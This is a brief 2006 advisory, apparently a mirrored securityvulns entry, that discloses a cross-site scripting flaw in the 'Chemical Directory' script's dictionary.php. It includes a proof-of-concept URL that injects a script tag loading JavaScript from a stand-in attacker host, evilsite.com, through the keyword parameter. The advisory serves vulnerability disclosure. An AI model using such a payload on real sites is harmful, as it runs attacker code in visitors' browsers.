Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:13042
HistoryJun 09, 2006 - 12:00 a.m.

Chemical Directory - XSS

2006-06-0900:00:00
vulners.com
10

Chemical Directory v.unknown (doesnt say on website)

Homepage:
http://www.scriptsez.net/

Effected files:
dictionary.php

XSS Vulnerability via keyword variable:

http://www.example.com/dictionary.php?action=browse&keyword=e[SCRIPT
SRC=http://evilsite.com/xss.js][/SCRIPT]